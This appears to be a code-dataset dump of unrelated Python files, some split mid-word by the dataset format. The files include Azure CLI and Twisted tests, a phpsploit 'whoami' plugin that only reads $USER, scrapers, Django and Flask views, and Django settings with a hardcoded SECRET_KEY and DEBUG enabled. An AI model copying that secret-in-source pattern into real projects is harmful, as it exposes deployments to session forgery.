existing = next(arg for arg in command_metadata.arguments if arg == probe)
self.assertDictContainsSubset(some_expected_arguments[existing].settings,
command_metadata.arguments[existing].options)
self.assertEqual(command_metadata.arguments['resource_group_name'].options_list,
['--resource-group-name'])
def test_register_command_from_extension(self):
command_table.clear()
# A standard command
cli_command(None, 'hello world', 'dummy_operation', None)
self.assertEqual(len(command_table), 1)
self.assertEqual(command_table['hello world'].command_source, None)
command_table.clear()
# A command from an extension
cli_command('{}myextension'.format(EXTENSIONS_MOD_PREFIX), 'hello world', 'dummy_operation', None)
self.assertEqual(len(command_table), 1)
cmd_source = command_table['hello world'].command_source
self.assertTrue(isinstance(cmd_source, ExtensionCommandSource))
self.assertFalse(cmd_source.overrides_command)
command_table.clear()
# A command from an extension that overrides the original command
cli_command(None, 'hello world', 'dummy_operation', None)
cli_command('{}myextension'.format(EXTENSIONS_MOD_PREFIX), 'hello world', 'dummy_operation', None)
self.assertEqual(len(command_table), 1)
cmd_source = command_table['hello world'].command_source
self.assertTrue(isinstance(cmd_source, ExtensionCommandSource))
self.assertTrue(cmd_source.overrides_command)
command_table.clear()
def test_register_cli_argument_with_overrides(self):
command_table.clear()
global_vm_name_type = CliArgumentType(
options_list=('--foo', '-f'), metavar='FOO', help='foo help'
)
derived_vm_name_type = CliArgumentType(base_type=global_vm_name_type,
help='first modification')
cli_command(None, 'test vm-get',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
cli_command(None, 'test command vm-get-1',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
cli_command(None, 'test command vm-get-2',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
register_cli_argument('test', 'vm_name', global_vm_name_type)
register_cli_argument('test command', 'vm_name', derived_vm_name_type)
register_cli_argument('test command vm-get-2', 'vm_name', derived_vm_name_type,
help='second modification')
command_table['test vm-get'].load_arguments()
command_table['test command vm-get-1'].load_arguments()
command_table['test command vm-get-2'].load_arguments()
_update_command_definitions(command_table)
self.assertEqual(len(command_table), 3,
'We expect exactly three commands in the command table')
command1 = command_table['test vm-get'].arguments['vm_name']
command2 = command_table['test command vm-get-1'].arguments['vm_name']
comma
|
nil0x42/phpsploit
|
plugins/system/whoami/plugin.py
|
Python
|
gpl-3.0
| 371
| 0
|
"""Print effectiv
|
e userid
SYNOPSIS:
whoami
DESCRIPTION:
Print the user name associated with current remote
server access rights.
* PASSIVE PLUGIN:
No requests are sent to server, as current user
is known by $USER environment variable (`env USER`);
AUTHOR:
nil0x42 <http://goo.gl/kb2wf>
"""
from api import environ
|
print(environ['USER'])
|
nbi-opendata/metadaten-scraper
|
get-metadata.py
|
Python
|
mit
| 3,412
| 0.003224
|
import json, io, re, requests
from bs4 import BeautifulSoup
from datetime import datetime
def get_datasets(url):
r = requests.get(url.format(0))
soup = BeautifulSoup(r.text)
href = soup.select('#block-system-main a')[-1]['href']
last_page = int(re.match(r'.*page=(.*)', href).group(1))
for page in range(last_page + 1):
print( '[DEBUG] page:', page )
r = requests.get(url.format(page))
soup = BeautifulSoup(r.text)
for link in soup.select('h2 a'):
yield (link['href'], link.text)
def get_metadata(url):
r = requests.get(url)
soup = BeautifulSoup(r.text)
metadata = dict()
    metadata['_url'] = url  # url is already fully formatted by the caller
metadata['_collection_date'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
for elem in soup.select('.datasetview_container .datasetview_row'):
for field in elem.select('.field'):
label = field.select('.field-label')[0].text[:-2]
item_list = list()
item = field.select('.field-item')
if label == 'Website':
metadata[label] = item[0].select('a')[0]['href']
elif len(item) == 0:
items = elem.select('.tag_list a')
for i in items:
item_list.append(i.text.strip())
metadata[label] = item_list
else:
metadata[label] = item[0].text.strip()
tags = set()
for elem in soup.select('.tag_list a'):
tags.add(elem.text.strip())
metadata['tags'] = list(tags)
return metadata
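# get_metadata() returns a dict roughly of this shape (the field labels depend
# on the scraped page and are illustrative only):
#     {'_url': 'http://daten.berlin.de/datensaetze/...',
#      '_collection_date': '2017-01-01 12:00:00',
#      'Website': 'http://...',
#      'tags': ['verkehr', ...]}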
if __name__ == '__main__':
base_url = 'http://daten.berlin.de{}'
datasets_url = 'http://daten.berlin.de/datensaetze?page={}'
documents_url = 'http://daten.berlin.de/dokumente?page={}'
all_labels = set()
all_metadata = list()
done_datasets = set()
# iterate over all dataset urls
for d, t in get_datasets(datasets_url):
if d in done_datasets:
print('skip', d)
continue # skip datasets
m = get_metadata(base_url.format(d))
m['_type
|
'] = 'dataset'
m['_title'] = t
a
|
ll_metadata.append(m)
for k in m.keys(): all_labels.add(k)
print(json.dumps(m, sort_keys=1, ensure_ascii=False))
done_datasets.add(d)
# iterate over all document urls
for d, t in get_datasets(documents_url):
if d in done_datasets:
print('skip', d)
continue # skip datasets
m = get_metadata(base_url.format(d))
m['_type'] = 'document'
m['_title'] = t
all_metadata.append(m)
for k in m.keys(): all_labels.add(k)
print(json.dumps(m, sort_keys=1, ensure_ascii=False))
done_datasets.add(d)
# write json file
with io.open('daten-berlin_metadata.json', 'w', encoding='utf8') as json_file:
json_file.write((json.dumps(all_metadata, indent=2, sort_keys=True, ensure_ascii=False)))
# write csv
with open('daten-berlin_metadata.csv', 'wb') as csv_file:
for l in sorted(all_labels):
csv_file.write((l + ';').encode('utf8'))
csv_file.write('\n'.encode('utf8'))
for m in all_metadata:
for l in sorted(all_labels):
if l in m:
csv_file.write(str(m[l]).encode('utf8'))
csv_file.write(';'.encode('utf8'))
csv_file.write('\n'.encode('utf8'))
|
PMBio/limix
|
External/nlopt/test/test_std.py
|
Python
|
apache-2.0
| 727
| 0
|
# #!/usr/bin/env python
#
# import nlopt # THIS IS NOT A PACKAGE!
# import num
|
py as np
#
# print(('nlopt version='+nlopt.__version__))
#
# def f(x, grad):
# F=x[0]
# L=x[1]
# E=x[2]
# I=x[3]
# D=F*L**3/(3.*E*I)
# return D
#
# n = 4
# opt = nlopt.opt(nlopt.LN_COBYLA, n)
# opt.set_min_objective(f)
# lb = np.array([40., 50., 30e3, 1.])
# ub = np.array([60., 60., 40e3, 10.])
# x = (lb+ub)/2.
# opt.set_low
|
er_bounds(lb)
# opt.set_upper_bounds(ub)
# opt.set_xtol_rel(1e-3)
# opt.set_ftol_rel(1e-3)
# xopt = opt.optimize(x)
#
# opt_val = opt.last_optimum_value()
# result = opt.last_optimize_result()
# print(('opt_result='+str(result)))
# print(('optimizer='+str(xopt)))
# print(('opt_val='+str(opt_val)))
|
rfancn/wxgigo
|
wxgigo/wxmp/sdk/plugin/fshelper.py
|
Python
|
mit
| 5,556
| 0.00324
|
#!/usr/bin/env python
# coding=utf-8
"""
Copyright (C) 2010-2013, Ryan Fan <ryan.fan@oracle.com>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Library General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""
from __future__ import absolute_import
import os
import sys
import logging
logger = logging.getLogger(__name__)
from sdk.constants import *
from sdk.utils import load_class
from sdk.plugin.base import BasePlugin
from sdk.plugin.config import BasePluginConfig
class FSPluginHelper(object):
"""
Filesystem Plugin helper functions
"""
def __init__(self, app):
super(FSPluginHelper, self).__init__()
self.plugins_dir = app.config.plugins_dir
# make sure plugins dir is in python search path
sys.path.insert(1, self.plugins_dir)
def __is_valid_plugin_module(self, plugin_name):
# check if "plugin.py" under plugin package
PLUGIN_FILE = os.path.join(self.plugins_dir, "{0}".format(plugin_name.lower()), "plugin.py")
if not os.path.exists(PLUGIN_FILE):
print "no plugin.py file under {0} plugin package".format(plugin_name)
return False
return True
def fs_get_plugin_class(self, plugin_name):
"""
Dynamically retrieve plugin class from filesystem
@param plugin_name: plugin name, it is a package name under plugins base directory
@return cls: valid Plugin class name
"""
#if not self.__is_valid_plugin_module(plugin_name):
# print "Invalid plugin module: {0}".format(plugin_name)
# return None
try:
# here must conver
|
t plugin name to lowercased one
module_path = "{0}.plugin".format(plugin_name.lower())
cls = load_class(module_path, WXMP_PLUGIN_CLASS_NAME)
if not issubclass(cls, BasePlugin):
print "Object: {
|
0} is not a subclass of BasePlugin".format(cls)
return None
except Exception,e:
raise e
return cls
def fs_get_plugin_config_class(self, plugin_name):
"""
Dynamically retrieve plugin class from filesystem
@param plugin_name: plugin name, it is a package name under plugins base directory
@return cls: valid Plugin class name
"""
if not self.__is_valid_plugin_module(plugin_name):
print "Invalid plugin module: {0}".format(plugin_name)
return None
try:
# here must convert plugin name to lowercased one
module_path = "{0}.plugin".format(plugin_name.lower())
cls = load_class(module_path, WXMP_PLUGIN_CONFIG_CLASS_NAME)
if not issubclass(cls, BasePluginConfig):
print "Object: {0} is not a subclass of BasePluginConfig".format(cls)
return None
except Exception,e:
print "Warning: No {0} plugin config class because of: {1}".format(plugin_name, e)
return None
return cls
def __build_meta_dict(self, plugin_instance):
"""
Build meta dict from plugin instance as below:
{ 'name':'x','version': '0.1', ...}
@param: plugin instance
@return: meta dict
"""
meta_dict = {}
for k in BasePlugin.meta_keys:
meta_dict[k] = plugin_instance.__class__.__dict__[k]
return meta_dict
def fs_get_meta_all(self):
"""
Get all plugins meta list from filesystem
"""
meta_list = []
all_plugin_instances = self.fs_get_plugin_instances_all()
for pinstance in all_plugin_instances:
d = self.__build_meta_dict(pinstance)
meta_list.append(d)
return meta_list
def fs_get_meta(self, plugin_name):
"""
Get specific plugin's meta dict by plugin name
"""
plugin_instance = self.fs_get_plugin_instance(plugin_name)
if not plugin_instance:
return {}
return self.__build_meta_dict(plugin_instance)
def fs_get_plugin_instance(self, plugin_name):
plugin_class = self.fs_get_plugin_class(plugin_name)
if not plugin_class:
return None
try:
plugin_instance = plugin_class()
except Exception,e:
raise e
return plugin_instance
def fs_get_plugin_instances_all(self):
"""
Probe plugin package deployed in filesystem and try to initialize plugin instances
@return: the list of plugin instance
"""
# get the top-level dir under plugin parent dir
plugin_instance_list = []
plugin_name_list = os.walk(self.plugins_dir).next()[1]
for plugin_name in plugin_name_list:
plugin_instance = self.fs_get_plugin_instance(plugin_name)
if plugin_instance:
plugin_instance_list.append(plugin_instance)
return plugin_instance_list
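# An illustrative lookup (the plugin name is hypothetical; the helper expects a
# "<name>/plugin.py" package under app.config.plugins_dir):
#
#     helper = FSPluginHelper(app)
#     cls = helper.fs_get_plugin_class('echo')
#     plugin = cls() if cls else None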
|
mpdevilleres/tbpc_app
|
tbpc/resource_mgt/utils.py
|
Python
|
mit
| 5,806
| 0.002756
|
#!/usr/bin/env python
import copy
import datetime as dt
import re
from decimal import Decimal, InvalidOperation
from openpyxl import *
from openpyxl.cell import Cell
from openpyxl.utils import get_column_letter
from openpyxl.worksheet import Worksheet
# OPENPYXL WITH INSERT ROW
# ----------------------------------------------------------------------------------------------------
def insert_rows(self, row_idx, cnt, above=False, copy_style=True, fill_formulae=True):
"""Inserts new (empty) rows into worksheet at specified row index.
:param self: Class object
:param row_idx: Row index specifying where to insert new rows.
:param cnt: Number of rows to insert.
:param above: Set True to insert rows above specified row index.
    :param copy_style: Set True if new rows should copy the style of the row immediately above.
    :param fill_formulae: Set True if new rows should take on the formula from the row immediately above, with cell references updated to point at the new rows.
Usage:
* insert_rows(2, 10, above=True, copy_style=False)
"""
    CELL_RE = re.compile(r"(?P<col>\$?[A-Z]+)(?P<row>\$?\d+)")
row_idx = row_idx - 1 if above else row_idx
def replace(m):
row = m.group('row')
prefix = "$" if row.find("$") != -1 else ""
row = int(row.replace("$", ""))
|
row += cnt if row > row_idx else 0
return m.group('col') + prefix + str(row)
# First, we shift all cells down cnt rows...
old_cells = set()
old_fas = set(
|
)
new_cells = dict()
new_fas = dict()
for c in self._cells.values():
old_coor = c.coordinate
# Shift all references to anything below row_idx
if c.data_type == Cell.TYPE_FORMULA:
c.value = CELL_RE.sub(
replace,
c.value
)
# Here, we need to properly update the formula references to reflect new row indices
if old_coor in self.formula_attributes and 'ref' in self.formula_attributes[old_coor]:
self.formula_attributes[old_coor]['ref'] = CELL_RE.sub(
replace,
self.formula_attributes[old_coor]['ref']
)
# Do the magic to set up our actual shift
if c.row > row_idx:
old_coor = c.coordinate
old_cells.add((c.row, c.col_idx))
c.row += cnt
new_cells[(c.row, c.col_idx)] = c
if old_coor in self.formula_attributes:
old_fas.add(old_coor)
fa = self.formula_attributes[old_coor].copy()
new_fas[c.coordinate] = fa
for coor in old_cells:
del self._cells[coor]
self._cells.update(new_cells)
for fa in old_fas:
del self.formula_attributes[fa]
self.formula_attributes.update(new_fas)
# Next, we need to shift all the Row Dimensions below our new rows down by cnt...
for row in range(len(self.row_dimensions) - 1 + cnt, row_idx + cnt, -1):
new_rd = copy.copy(self.row_dimensions[row - cnt])
new_rd.index = row
self.row_dimensions[row] = new_rd
del self.row_dimensions[row - cnt]
# Now, create our new rows, with all the pretty cells
row_idx += 1
for row in range(row_idx, row_idx + cnt):
# Create a Row Dimension for our new row
new_rd = copy.copy(self.row_dimensions[row - 1])
new_rd.index = row
self.row_dimensions[row] = new_rd
for col in range(1, self.max_column):
col = get_column_letter(col)
cell = self.cell('%s%d' % (col, row))
cell.value = None
source = self.cell('%s%d' % (col, row - 1))
if copy_style:
cell.number_format = source.number_format
cell.font = source.font.copy()
cell.alignment = source.alignment.copy()
cell.border = source.border.copy()
cell.fill = source.fill.copy()
if fill_formulae and source.data_type == Cell.TYPE_FORMULA:
s_coor = source.coordinate
if s_coor in self.formula_attributes and 'ref' not in self.formula_attributes[s_coor]:
fa = self.formula_attributes[s_coor].copy()
self.formula_attributes[cell.coordinate] = fa
# print("Copying formula from cell %s%d to %s%d"%(col,row-1,col,row))
cell.value = re.sub(
"(\$?[A-Z]{1,3}\$?)%d" % (row - 1),
lambda m: m.group(1) + str(row),
source.value
)
cell.data_type = Cell.TYPE_FORMULA
# Check for Merged Cell Ranges that need to be expanded to contain new cells
for cr_idx, cr in enumerate(self.merged_cell_ranges):
self.merged_cell_ranges[cr_idx] = CELL_RE.sub(
replace,
cr
)
Worksheet.insert_rows = insert_rows
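# Illustrative usage sketch (not part of the original module): it exercises the
# monkeypatched Worksheet.insert_rows above on a freshly built workbook, and it
# assumes the same openpyxl 2.x API that the helper itself relies on.
if __name__ == '__main__':
    wb = Workbook()
    ws = wb.active
    for i in range(1, 6):
        ws.cell(row=i, column=1, value='row %d' % i)
    ws.insert_rows(2, cnt=3, above=True)  # three empty rows above row 2
    print(ws.max_row)  # expect 8 rows after the insert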
# ----------------------------------------------------------------------------------------------------
# END OPENPYXL
# MISC
# ----------------------------------------------------------------------------------------------------
def to_bool(data):
if isinstance(data, str):
data = data.lower()
if data == "0" or data == "false":
return False
elif data == "1" or data == "true":
return True
return NotImplemented
def to_date_format(string):
# remove time element
string = string.split(' ')[0]
try:
return dt.datetime.strptime(string, '%d/%m/%Y')
except ValueError:
return None
def to_dec(data):
try:
return Decimal(data)
except InvalidOperation:
return Decimal('0')
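# Illustrative sketch (not part of the original module): quick sanity checks of
# the conversion helpers above; the sample inputs are made up.
if __name__ == '__main__':
    assert to_bool('TRUE') is True
    assert to_bool('0') is False
    assert to_date_format('31/12/2016 08:00') == dt.datetime(2016, 12, 31)
    assert to_dec('not a number') == Decimal('0')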
# ----------------------------------------------------------------------------------------------------
# END MISC
|
kenorb-contrib/BitTorrent
|
twisted/test/test_task.py
|
Python
|
gpl-3.0
| 6,793
| 0.004122
|
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
from twisted.trial import unittest
from twisted.internet import task, reactor, defer
from twisted.python import failure
class TestableLoopingCall(task.LoopingCall):
def __init__(self, clock, *a, **kw):
super(TestableLoopingCall, self).__init__(*a, **kw)
self._callLater = lambda delay: clock.callLater(delay, self)
self._seconds = clock.seconds
class FakeDelayedCall(object):
def __init__(self, when, clock, what, a, kw):
self.clock = clock
self.when = when
self.what = what
self.a = a
self.kw = kw
def __call__(self):
return self.what(*self.a, **self.kw)
def __repr__(self):
return "<FakeDelayedCall of %r>" % (self.what,)
def cancel(self):
self.clock.calls.remove((self.when, self))
class Clock(object):
rightNow = 0.0
def __init__(self):
self.calls = []
def seconds(self):
return self.rightNow
def callLater(self, when, what, *a, **kw):
self.calls.append((self.seconds() + when, FakeDelayedCall(self.seconds() + when, self, what, a, kw)))
return self.calls[-1][1]
def adjust(self, amount):
self.rightNow += amount
def runUntilCurrent(self):
while self.calls and self.calls[0][0] <= self.seconds():
when, call = self.calls.pop(0)
call()
def pump(self, timings):
timings = list(timings)
timings.reverse()
self.calls.sort()
while timings:
self.adjust(timings.pop())
self.runUntilCurrent()
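# Illustrative sketch (not part of the original test module): shows how the fake
# Clock above drives a TestableLoopingCall deterministically, the same pattern
# the test cases below rely on.
def _clock_demo():
    clock = Clock()
    ticks = []
    lc = TestableLoopingCall(clock, ticks.append, "tick")
    lc.start(1.0)              # first call happens immediately
    clock.pump([0.5, 1.0, 1.0])
    lc.stop()
    return ticks               # with these timings, three entries are expected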
class TestException(Exception):
pass
class LoopTestCase(unittest.TestCase):
def testBasicFunction(self):
# Arrange to have time advanced enough so that our function is
# called a few times.
# Only need to go to 2.5 to get 3 calls, since the first call
# happens before any time has elapsed.
timings = [0.05, 0.1, 0.1]
clock = Clock()
L = []
def foo(a, b, c=None, d=None):
L.append((a, b, c, d))
lc = TestableLoopingCall(clock, foo, "a", "b", d="d")
D = lc.start(0.1)
theResult = []
def saveResult(result):
theResult.append(result)
D.addCallback(saveResult)
clock.pump(timings)
self.assertEquals(len(L), 3,
"got %d iterations, not 3" % (len(L),))
for (a, b, c, d) in L:
self.assertEquals(a, "a")
self.assertEquals(b, "b")
self.assertEquals(c, None)
self.assertEquals(d, "d")
lc.stop()
self.assertIdentical(theResult[0], lc)
# Make sure it isn't planning to do anything further.
self.failIf(clock.calls)
def testDelayedStart(self):
timings = [0.05, 0.1, 0.1]
clock = Clock()
L = []
lc = TestableLoopingCall(clock, L.append, None)
d = lc.start(0.1, now=False)
theResult = []
def saveResult(result):
theResult.append(result)
d.addCallback(saveResult)
clock.pump(timings)
self.assertEquals(len(L), 2,
"got %d iterations, not 2" % (len(L),))
lc.stop()
self.assertIdentical(theResult[0], lc)
self.failIf(clock.calls)
def testBadDelay(self):
lc = task.LoopingCall(lambda: None)
self.assertRaises(ValueError, lc.start, -1)
# Make sure that LoopingCall.stop() prevents any subsequent calls.
def _stoppingTest(self, delay):
ran = []
def foo():
ran.append(None)
clock = Clock()
lc = TestableLoopingCall(clock, foo)
d = lc.start(delay, now=False)
lc.stop()
self.failIf(ran)
self.failIf(clock.calls)
def testStopAtOnce(self):
return self._stoppingTest(0)
def testStoppingBeforeDelayedStart(self):
return self._stoppingTest(10)
class ReactorLoopTestCase(unittest.TestCase):
# Slightly inferior tests which exercise interactions with an actual
# reactor.
def testFailure(self):
def foo(x):
raise TestException(x)
lc = task.LoopingCall(foo, "bar")
return self.assertFailure(lc.start(0.1), TestException)
def testFailAndStop(self):
def foo(x):
lc.stop()
raise TestException(x)
lc = task.LoopingCall(foo, "bar")
return self.assertFailure(lc.start(0.1), TestException)
def testEveryIteration(self):
ran = []
def foo():
ran.append(None)
if len(ran) > 5:
lc.stop()
lc = task.LoopingCall(foo)
d = lc.start(0)
def stopped(ign):
self.assertEquals(len(ran), 6)
return d.addCallback(stopped)
def testStopAtOnceLater(self):
# Ensure that even when LoopingCall.stop() is called from a
# reactor callback, it still prevents any subsequent calls.
d = defer.Deferred()
def foo():
d.errback(failure.DefaultException(
"This task also should never get called."))
self._lc = task.LoopingCall(foo)
self._lc.start(1, now=False)
        reactor.callLater(0, self._callback_for_testStopAtOnceLater, d)
return d
def _callback_for_testStopAtOnceLater(self, d):
self._lc.stop()
reactor.callLater(0, d.callback, "success")
def testWaitDeferred(self):
# Tests if the callable isn't scheduled again before the returned
# deferred has fired.
timings = [0.2, 0.8]
clock = Clock()
def foo():
d = defer.Deferred()
d.addCallback(lambda _: lc.stop())
clock.callLater(1, d.callback, None)
return d
lc = TestableLoopingCall(clock, foo)
d = lc.start(0.2)
clock.pump(timings)
self.failIf(clock.calls)
def testFailurePropagation(self):
# Tests if the failure of the errback of the deferred returned by the
# callable is propagated to the lc errback.
#
# To make sure this test does not hang trial when LoopingCall does not
# wait for the callable's deferred, it also checks there are no
# calls in the clock's callLater queue.
timings = [0.3]
clock = Clock()
def foo():
d = defer.Deferred()
clock.callLater(0.3, d.errback, TestException())
return d
lc = TestableLoopingCall(clock, foo)
d = lc.start(1)
self.assertFailure(d, TestException)
clock.pump(timings)
self.failIf(clock.calls)
return d
|
gnovis/swift
|
swift_fca/swift_core/object_fca.py
|
Python
|
gpl-3.0
| 131
| 0
|
class Object:
def __init__(self, name):
        self._name = name
@property
def name(self):
return self._name
| |
yourcelf/btb
|
scanblog/accounts/views.py
|
Python
|
agpl-3.0
| 2,880
| 0.002431
|
"""
This app is a simple extension of the built-in auth_views which overrides login and
logout to provide messages on successful login/out.
"""
from django.contrib.auth import views as auth_views
from django.utils.translation import ugettext as _
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.contrib.auth.forms import SetPasswordForm, PasswordChangeForm
from django.contrib import messages
from django.shortcuts import render
from django.template import RequestContext
from django.http import HttpResponseRedirect, HttpResponse
from django.contrib.auth.decorators import login_required
from btb.utils import can_edit_user
from accounts.forms import OptionalEmailForm
from registration.backends.simple.views import RegistrationView
def login(request, *args, **kwargs):
kwargs['extra_context'] = {
'reg_form': OptionalEmailForm(auto_id="regid_%s")
}
response = auth_views.login(request, *args, **kwargs)
return response
def logout(request, *args, **kwargs):
messages.success(request, _("Successfully logged out."))
response = auth_views.logout(request, *args, **kwargs)
return response
def check_username_availability(request):
username = request.GET.get('username', None)
if not username:
response = HttpResponse('{"result": null}')
if User.objects.filter(username=username).exists():
response = HttpResponse('{"result": "taken"}')
else:
response = HttpResponse('{"result": "available"}')
response['Content-Type'] = "application/json"
    return response
def change_password(request, user_id):
"""
Change the password of the user with the given user_id. Checks for
permission to change users.
"""
if not can_edit_user(request.user, user_id):
raise PermissionDenied
    if request.user.id == int(user_id):
Form = PasswordChangeForm
else:
Form = SetPasswordForm
user = User.objects.get(id=user_id)
if request.POST:
form = Form(user, request.POST)
if form.is_valid():
form.save()
messages.success(request, _("Password changed successfully."))
return HttpResponseRedirect(reverse("profiles.profile_edit", args=[user_id]))
else:
form = Form(request.user)
return render(request, "registration/password_change_form.html", {
'form': form,
'change_user': user,
})
@login_required
def welcome(request):
return render(request, 'registration/welcome.html')
class OptionalEmailRegistrationView(RegistrationView):
form_class = OptionalEmailForm
def get_success_url(self, user):
if 'after_login' in self.request.session:
return self.request.session.pop('after_login')
return reverse("accounts-post-registration")
|
codeka/wwmmo
|
website/handlers/blog.py
|
Python
|
mit
| 1,074
| 0.015829
|
import datetime
from flask import abort, render_template, request, redirect, Response
import ctrl.blog
from . import handlers
@handlers.route('/blog')
def blog_index():
pageNo = 0
if request.args.get('page'):
pageNo = int(request.args.get('page'))
if pageNo < 0:
pageNo = 0
posts = ctrl.blog.getPosts(pageNo)
if not posts and pageNo > 0:
        return redirect('/blog?page=%d' % (pageNo - 1))
return render_template('blog/index.html', posts=posts, pageNo=pageNo)
@handlers.route('/blog/<year>/<month>/<slug>')
def blog_post(year, month, slug):
    post = ctrl.blog.getPostBySlug(int(year), int(month), slug)
if not post:
abort(404)
return render_template('blog/post.html', post=post)
@handlers.route('/blog/rss')
def blog_rss():
posts = ctrl.blog.getPosts(0, 15)
pubDate = datetime.time()
if posts and len(posts) > 0:
pubDate = posts[0].posted
return Response(
render_template('blog/rss.xml', posts=posts,
pubDate=pubDate.strftime('%a, %d %b %Y %H:%M:%S GMT')),
content_type='application/rss+xml')
|
sheeshmohsin/venturesity
|
flexy/flexy/settings.py
|
Python
|
mit
| 5,241
| 0.000763
|
# Django settings for flexy project.
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django_mongodb_engine',
'NAME': 'sheesh',
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = u'54c3c2ebf0d6142f25b84dce'
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# END MEDIA CONFIGURATION
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '9j(dx#&1&_s5^a71r4%+ct64(22rv6sm@ly07%1fwu4ta##&q)'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.messages.context_processors.messages',
'django.contrib.auth.context_processors.auth',
)
ROOT_URLCONF = 'flexy.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'flexy.wsgi.application'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'templates')
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
'bootstrap3',
'app',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
florian-f/sklearn
|
benchmarks/bench_sgd_regression.py
|
Python
|
bsd-3-clause
| 4,512
| 0.002216
|
"""
Benchmark for SGD regression
Compares SGD regression against coordinate descent and Ridge
on synthetic data.
"""
print(__doc__)
# Author: Peter Prettenhofer <peter.prettenhofer@gmail.com>
# License: BSD Style.
import numpy as np
import pylab as pl
import gc
from time import time
from sklearn.linear_model import Ridge, SGDRegressor, ElasticNet
from sklearn.metrics import mean_squared_error
from sklearn.datasets.samples_generator import make_regression
if __name__ == "__main__":
list_n_samples = np.linspace(100, 10000, 5).astype(np.int)
list_n_features = [10, 100, 1000]
n_test = 1000
noise = 0.1
alpha = 0.01
sgd_results = np.zeros((len(list_n_samples), len(list_n_features), 2))
elnet_results = np.zeros((len(list_n_samples), len(list_n_features), 2))
ridge_results = np.zeros((len(list_n_samples), len(list_n_features), 2))
for i, n_train in enumerate(list_n_samples):
for j, n_features in enumerate(list_n_features):
X, y, coef = make_regression(
n_samples=n_train + n_test, n_features=n_features,
noise=noise, coef=True)
X_train = X[:n_train]
y_train = y[:n_train]
X_test = X[n_train:]
y_test = y[n_train:]
print("=======================")
print("Round %d %d" % (i, j))
print("n_features:", n_features)
print("n_samples:", n_train)
# Shuffle data
idx = np.arange(n_train)
np.random.seed(13)
np.random.shuffle(idx)
X_train = X_train[idx]
y_train = y_train[idx]
std = X_train.std(axis=0)
